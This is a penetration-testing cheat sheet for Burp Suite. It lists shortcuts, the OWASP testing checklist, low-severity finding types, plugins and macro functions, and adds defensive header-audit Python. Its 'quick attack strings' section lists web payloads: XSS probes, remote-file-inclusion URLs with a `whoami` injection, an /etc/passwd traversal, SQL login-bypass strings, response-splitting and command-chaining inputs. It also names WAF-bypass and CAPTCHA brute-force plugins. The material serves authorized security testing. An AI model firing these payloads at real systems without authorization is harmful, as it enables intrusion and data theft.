Application Security - Tool Usage - Burp Suite
A cheat sheet for PortSwigger Burp Suite application security testing framework.
KEYBOARD SHORTCUTS:
Send to Repeater: Ctrl+R
Send to Intruder: Ctrl+I
Forward intercepted Proxy message: Ctrl+F
Toggle Proxy interception: Ctrl+T
Switch to Target: Ctrl+Shift+T
Switch to Proxy: Ctrl+Shift+P
Switch to Scanner: Ctrl+Shift+S
Switch to Intruder: Ctrl+Shift+I
Switch to Repeater: Ctrl+Shift+R
Switch to Suite options: Ctrl+Shift+O
Switch to Alerts tab: Ctrl+Shift+A
Go to previous tab: Ctrl+Minus
Go to next tab: Ctrl+Equals
Editor:
Cut: Ctrl+X
Copy: Ctrl+C
Paste: Ctrl+V
Undo: Ctrl+Z
Redo: Ctrl+Y
Select all: Ctrl+A
Search: Ctrl+S
Go to previous search match: Ctrl+Comma
Go to next search match: Ctrl+Period
URL-decode: Ctrl+Shift+U
URL-encode key characters: Ctrl+U
HTML-decode: Ctrl+Shift+H
HTML-encode key characters: Ctrl+H
Base64-decode: Ctrl+Shift+B
Base64-encode: Ctrl+B
Backspace word: Ctrl+Backspace
Delete word: Ctrl+Delete
Delete line: Ctrl+D
Go to previous word: Ctrl+Left
Go to previous word (extend selection): Ctrl+Shift+Left
Go to next word: Ctrl+Right
Go to next word (extend selection): Ctrl+Shift+Right
Go to previous paragraph: Ctrl+Up
Go to previous paragraph (extend selection): Ctrl+Shift+Up
Go to next paragraph: Ctrl+Down
Go to next paragraph (extend selection): Ctrl+Shift+Down
Go to start of document: Ctrl+Home
Go to start of document (extend selection): Ctrl+Shift+Home
Go to end of document: Ctrl+End
Go to end of document (extend selection): Ctrl+Shift+End
BASIC PASSIVE AND ACTIVE CHECKS:
Burpsuite Spider with intelligent form submission
Manual crawl of website through Burpsuite proxy and submitting INJECTX payloads for tracking
Burpsuite passive scan
Burpsuite engagement tools > Search > <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
Burpsuite engagement tools > Find comments
Burpsuite engagement tools > Find scripts
Burpsuite engagement tools > Find references
Burpsuite engagement tools > Analyze target
Burpsuite engagement tools > Discover content
Burpsuite Intruder > file/directory brute force
Burpsuite Intruder > HTTP methods, user agents, etc.
Enumerate all software technologies, HTTP methods, and potential attack vectors.
Understand the function of the site, what types of data are stored or valuable, and which functions are worth testing, etc.
ENUMERATION:
OPERATING SYSTEM
WEB SERVER
DATABASE SERVERS
PROGRAMMING LANGUAGES
PLUGINS/VERSIONS
OPEN PORTS
USERNAMES
SERVICES
WEB SPIDERING
GOOGLE HACKING
VECTORS:
INPUT FORMS
GET/POST PARAMS
URI/REST STRUCTURE
COOKIES
HEADERS
SEARCH STRINGS:
Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...
fname|phone|id|org_name|name|email
QUICK ATTACK STRINGS:
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...
Company
First Last
username
username@mailinator.com
Password123$
+
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt%00.png
https://google.com/.injectx/rfi_vuln.txt%00.html // INJECTX
'>"></INJECTX>(1)
javascript:alert()//
"><img/onload=alert(1)>' --
"></textarea><img/onload=alert(1)>' --
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!--
"><img/onload=alert(1)>' -- // INJECTX <!--
INJECTX'"><h1>X<!--
INJECTX"><h1>X
en%0AContent-Length%3A%%0A%0AHTTP%2F1.%%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%%0A%0AHTTP%2F1.%%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd%
{{+}}
sleep ; sleep || sleep | sleep & sleep && sleep
admin" or ""=""--
admin' or ''=''--
INJECTX%0a%0d%
OWASP TESTING CHECKLIST:
Spiders, Robots and Crawlers IG-
Search Engine Discovery/Reconnaissance IG-
Identify application entry points IG-
Testing for Web Application Fingerprint IG-
Application Discovery IG-
Analysis of Error Codes IG-
SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM-
DB Listener Testing - DB Listener weak CM-
Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM-
Application Configuration Management Testing - Application Configuration management weakness CM-
Testing for File Extensions Handling - File extensions handling CM-
Old, backup and unreferenced files - Old, backup and unreferenced files CM-
Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM-
Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM-
Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-
Testing for user enumeration - User enumeration AT-
Testing for Guessable (Dictionary) User Account - Guessable user account AT-
Brute Force Testing - Credentials Brute forcing AT-
Testing for bypassing authentication schema - Bypassing authentication schema AT-
Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-
Testing for Logout and Browser Cache Management - Logout function not properly implemented, browser cache weakness AT-
Testing for CAPTCHA - Weak Captcha implementation AT-
Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-
Testing for Race Conditions - Race Conditions vulnerability AT-
Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-
Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-
Testing for Session Fixation - Session Fixation SM-
Testing for Exposed Session Variables - Exposed sensitive session variables SM-
Testing for CSRF - CSRF SM-
Testing for Path Traversal - Path Traversal AZ-
Testing for bypassing authorization schema - Bypassing authorization schema AZ-
Testing for Privilege Escalation - Privilege Escalation AZ-
Testing for Business Logic - Bypassable business logic BL-
Testing for Reflected Cross Site Scripting - Reflected XSS DV-
Testing for Stored Cross Site Scripting - Stored XSS DV-
Testing for DOM based Cross Site Scripting - DOM XSS DV-
Testing for Cross Site Flashing - Cross Site Flashing DV-
SQL Injection - SQL Injection DV-
LDAP Injection - LDAP Injection DV-
ORM Injection - ORM Injection DV-
XML Injection - XML Injection DV-
SSI Injection - SSI Injection DV-
XPath Injection - XPath Injection DV-
IMAP/SMTP Injection - IMAP/SMTP Injection DV-
Code Injection - Code Injection DV-
OS Commanding - OS Commanding DV-
Buffer overflow - Buffer overflow DV-
Incubated vulnerability - Incubated vulnerability DV-
Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-
Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-
Locking Customer Accounts - Locking Customer Accounts DS-
Testing for DoS Buffer Overflows - Buffer Overflows DS-
User Specified Object Allocation - User Specified Object Allocation DS-
User Input as a Loop Counter - User Input as a Loop Counter DS-
Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-
Failure to Release Resources - Failure to Release Resources DS-
Storing too Much Data in Session - Storing too Much Data in Session DS-
WS Information Gathering - N.A. WS-
Testing WSDL - WSDL Weakness WS-
XML Structural Testing - Weak XML Structure WS-
XML content-level Testing - XML content-level WS-
HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST WS-
Naughty SOAP attachments - WS Naughty SOAP attachments WS-
Replay Testing - WS Replay Testing WS-
AJAX Vulnerabilities - N.A. AJ-
AJAX Testing - AJAX weakness AJ-
LOW SEVERITY:
A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.
Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP codes/pages or other HTTP non- codes/pages.
Banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Click-Jacking and issues only exploitable through click-jacking.
CSRF on forms which are available to anonymous users (e.g. the contact form).
Logout Cross-Site Request Forgery (logout CSRF).
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Lack of Secure and HTTPOnly cookie flags.
Lack of Security Speedbump when leaving the site.
Weak Captcha / Captcha Bypass
Username enumeration via Login Page error message
Username enumeration via Forgot Password error message
Login or Forgot Password page brute force and account lockout not enforced.
OPTIONS / TRACE HTTP method enabled
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL Insecure cipher suites
The Anti-MIME-Sniffing header X-Content-Type-Options
Missing HTTP security headers
Security best practices without accompanying Proof-of-Concept exploitation
Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP codes/pages or other HTTP non- codes/pages.
Denial of Service Attacks.
Fingerprinting / banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Clickjacking and issues only exploitable through clickjacking.
CSRF on non-sensitive forms.
Logout Cross-Site Request Forgery (logout CSRF).
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Lack of Secure/HTTPOnly flags on non-sensitive Cookies.
Lack of Security Speedbump when leaving the site.
Weak Captcha / Captcha Bypass
Login or Forgot Password page brute force and account lockout not enforced.
OPTIONS HTTP method enabled
HTTPS Mixed Content Scripts
Known vulnerable libraries
Attacks on Third Party Ad Services
Username / email enumeration via Forgot Password or Login page
Missing HTTP security headers
Strict-Transport-Security Not Enabled For HTTPS
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
Content-Security-Policy-Report-Only
SSL Issues, e.g.
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL weak / insecure cipher suites
Lack of SPF records (Email Spoofing)
Auto-complete enabled on password fields
HTTP enabled
Session ID or Login Sent Over HTTP
Insecure Cookies
Cross-Domain.xml Allows All Domains
HTML5 Allowed Domains
Cross Origin Policy
Content Sniffing Not Disabled
Password Reset Account Enumeration
HTML Form Abuse (Denial of Service)
Weak HSTS Age (, or less)
Lack of Password Security Policy (Brute Forcable Passwords)
Physical Testing
Denial of service attacks
Resource Exhaustion attacks
Issues related to rate limiting
Login or Forgot Password page brute force and account lockout not enforced
api*.netflix.com listens on port
Cross-domain access policy scoped to *.netflix.com
Username / Email Enumeration
via Login Page error message
via Forgot Password error message
via Registration
Weak password
Weak Captcha / Captcha bypass
Lack of Secure/HTTPOnly flags on cookies
Cookie valid after logout
Cookie valid after password reset
Cookie expiration
Forgot password autologin
Autologin token reuse
Same Site Scripting
SSL Issues, e.g.
SSL Attacks such as BEAST, BREACH, Renegotiation attack
SSL Forward secrecy not enabled
SSL weak / insecure cipher suites
SSL vulnerabilities related to configuration or version
Descriptive error messages (e.g. Stack Traces, application or server errors).
HTTP codes/pages or other HTTP non- codes/pages.
Fingerprinting/banner disclosure on common/public services.
Disclosure of known public files or directories, (e.g. robots.txt).
Clickjacking and issues only exploitable through clickjacking.
CSRF on forms that are available to anonymous users (e.g. the contact form).
Logout Cross-Site Request Forgery (logout CSRF).
Missing CSRF protection on non-sensitive functionality
Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
Incorrect Charset
HTML Autocomplete
OPTIONS HTTP method enabled
TRACE HTTP method enabled
Missing HTTP security headers, specifically
(https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.
Strict-Transport-Security
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP
Content-Security-Policy-Report-Only
Issues only present in old browsers/old plugins/end-of-life software browsers
IE <
Chrome <
Firefox <
Safari <
Opera <
Vulnerability reports related to the reported version numbers of web servers, services, or frameworks
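Several of the low-severity items above (missing HSTS, X-Frame-Options, X-Content-Type-Options and CSP headers, weak HSTS max-age, TRACE enabled, cookies without Secure/HttpOnly) can be checked mechanically from a single response. The following is an added example, not part of the original cheat sheet; the one-year HSTS threshold is an assumption, since the page elides its value, and the sample response is constructed.

```python
"""Audit HTTPS response headers and cookies for the low-severity items above.
Added example, not part of the original cheat sheet. Input: a dict of response
headers and the list of raw Set-Cookie values; returns finding strings."""
import re

# Assumed threshold for a "weak" HSTS max-age: one year (the page elides its value).
MIN_HSTS_MAX_AGE = 31536000

def audit_response(headers, set_cookies, https=True):
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []
    # Strict-Transport-Security: missing for HTTPS, or a short-lived max-age
    hsts = h.get("strict-transport-security")
    if https and hsts is None:
        findings.append("Strict-Transport-Security not enabled for HTTPS")
    elif hsts is not None:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < MIN_HSTS_MAX_AGE:
            findings.append("Weak HSTS max-age")
    # Clickjacking: X-Frame-Options or a CSP frame-ancestors directive
    csp = h.get("content-security-policy", "")
    if "x-frame-options" not in h and "frame-ancestors" not in csp.lower():
        findings.append("Missing X-Frame-Options / CSP frame-ancestors")
    if not csp:
        findings.append("Missing Content-Security-Policy")
    # Content sniffing must be disabled explicitly
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("Content sniffing not disabled (X-Content-Type-Options)")
    # Methods advertised in an Allow header (e.g. from an OPTIONS response)
    allow = {v.strip().upper() for v in h.get("allow", "").split(",") if v.strip()}
    if "TRACE" in allow:
        findings.append("TRACE HTTP method enabled")
    # Cookie flags: Secure (HTTPS only) and HttpOnly
    for raw in set_cookies:
        parts = [p.strip() for p in raw.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if https and "secure" not in attrs:
            findings.append(f"Cookie {name} lacks Secure flag")
        if "httponly" not in attrs:
            findings.append(f"Cookie {name} lacks HttpOnly flag")
    return findings

# Constructed sample response (not captured from any real site)
SAMPLE_HEADERS = {"Content-Type": "text/html",
                  "Strict-Transport-Security": "max-age=300",
                  "Allow": "GET, POST, OPTIONS, TRACE"}
SAMPLE_COOKIES = ["sessionid=abc123; Path=/; HttpOnly", "prefs=1; Path=/"]

if __name__ == "__main__":
    for finding in audit_response(SAMPLE_HEADERS, SAMPLE_COOKIES):
        print(finding)
```

Feed it the headers of a response copied from Proxy history; the sample above yields eight findings, a hardened response yields none.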
PLUGINS:
jsEncrypter.0.3 # encrypts request data
HackBar.jar
LFI scanner checks.jar # LFI detection
burp-vulners-scanner-1.2.jar # comparison against a vulnerability database
burplogger++.jar # extended logging module
chunked-coding-converter.0.2.1.jar # waf bypass
domain_hunter-v1.4.jar # domain collection
knife-v1.4.jar # character/encoding conversion
reCAPTCHA-v0.9.jar # CAPTCHA brute-forcing
sqlmap.jar # sqlmap api
AES-Encrypter
Assassin # subdomain brute-forcing | same-server (side-site) lookup
AuthMatrix # authorization flaw (privilege escalation) detection
Blazer #AMF Messages
BurpAMFDSer #AMF
BurpAuthzPlugin # can be replaced by AuthMatrix
BurpCSJ
BurpDOMXSS
BurpHeartbleedExtension
BurpHistorytoMysql
BurpJDSer-ng
BurpJDSer
BurpMultiDEC
BurpNotesExtension
BurpPassiveXssScan
BurpPatchMe
BurpSentinel
BurpSessionAuth
BurpSmartBuster
BurpWebSphere
Burp_CustomScannerChecks
Burp_saml # single sign-on
DOMXSSHilight
J2EEScan # can be replaced by LFI scanner checks
JSON
JavaScriptInjector # JS injection
MobileMiTM # man-in-the-middle
POST2JSON
PT-Manager
Refeffer
SAMLRaider
W3af # firewall (WAF) type detection
WCF-Binary-SOAP-Plug-In # WCF-related
Wsdler
Yara-Scanner # malicious sample identification
aesburp AES Tool
autoEdit
burp-Curlit
burp-git-bridge
burp-massimpo
burp-msc
burp-protobuf-decoder
burp-radamsa
burp_Gwtscan
burp_JSBeautifier
burp_extension-googlehack
burp_extension_MultiScanner
burp_extension_nmap_parser
burp_extension_payloadparser
burp_wicket_handler
CSRFScanner # CSRF detection
distribute-damage
faraday
jsEncrypter add jsEncrypter.jar
scriptgen
sleepy-puppy
xssValidator
xssless
BurpCO2_v1_0_0RC1.jar
BurpFlashCSRFBuilder-0.1.4.jar
BurpKit.jar add BurpKit.jar
BurpMultiProxy.jar
BurpMultiProxy_ListVer.jar
BurpPlugin-full.jar
Burp_MultiProxy.py
GrabTencentExmailContacts.jar
JavaSerialKiller.jar
LICENSE
README
activeScan++.py
aesburp_fat.jar
burp-image-size.jar
burp-paramalyzer.jar
burp-retire-js-2.jar
burpbuddy-2.0.0.jar
bypasswaf.jar #waf bypass
changeu.py
csrf-master.zip
key.bin
parrotng_v0.2.jar
rhinauditor-burp-plugin-1.jar
scriptgen-burp-plugin-3.jar
sentinelburp.xpi
shodanapi.py
sitemap-Import_links.py
threadfix-release-2.jar
update.bat
update.sh
ws.jar
MACROS:
Functions:
Verify, via a page redirect, whether the current session is still valid;
Perform the login action to obtain a new valid session;
Take a token or other parameter from the previous HTTP response and use it as an input parameter for subsequent requests (e.g. handling CSRF tokens);
During scanning or fuzzing, execute some prior requests first so that the scan requests can be processed normally;
After the test request has run, execute follow-up request operations (e.g. combined with Intruder, log in with different accounts and then vote in bulk).
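The first and third macro functions above (detect an expired session by its redirect, and carry a token from the previous response into the next request) modelled offline, as an added example that is not Burp's own code or part of the original cheat sheet. The hidden-input field name "csrf_token", the helper names and both sample responses are constructed.

```python
"""What a Burp session-handling macro does, modelled offline in plain Python.
Added example, not Burp's own code: the helper names, the hidden-input field
name "csrf_token" and the sample responses below are all constructed."""
import re
from urllib.parse import urlencode

# Constructed prior response: the page that carries the anti-CSRF token
FORM_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html

<form method="post" action="/vote">
  <input type="hidden" name="csrf_token" value="t0k3n-CONSTRUCTED">
  <input type="submit">
</form>"""

# Constructed response of a session check whose session has expired (redirect to login)
EXPIRED_RESPONSE = "HTTP/1.1 302 Found\nLocation: /login?next=%2Faccount\n\n"

def status_and_headers(raw):
    """Split a raw HTTP response into (status code, lowercase header dict, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = int(lines[0].split()[1])
    headers = {k.strip().lower(): v.strip()
               for k, v in (ln.split(":", 1) for ln in lines[1:])}
    return status, headers, body

def session_is_valid(raw):
    """Macro function 1: a redirect to the login page means the session is dead."""
    status, headers, _ = status_and_headers(raw)
    return not (status in (301, 302, 303, 307) and "/login" in headers.get("location", ""))

def extract_token(raw, field="csrf_token"):
    """Macro function 3: pull a hidden-input value out of the previous response."""
    _, _, body = status_and_headers(raw)
    m = re.search(r'name="%s"\s+value="([^"]+)"' % re.escape(field), body)
    return m.group(1) if m else None

def build_follow_up(raw, params, field="csrf_token"):
    """Rewrite the follow-up request body so the fresh token replaces the stale one."""
    token = extract_token(raw, field)
    if token is None:
        raise ValueError("no token in macro response; session handling rule cannot continue")
    return urlencode({**params, field: token})

if __name__ == "__main__":
    print(session_is_valid(EXPIRED_RESPONSE))  # False: macro should re-login first
    print(build_follow_up(FORM_RESPONSE, {"choice": "A", "csrf_token": "stale"}))
```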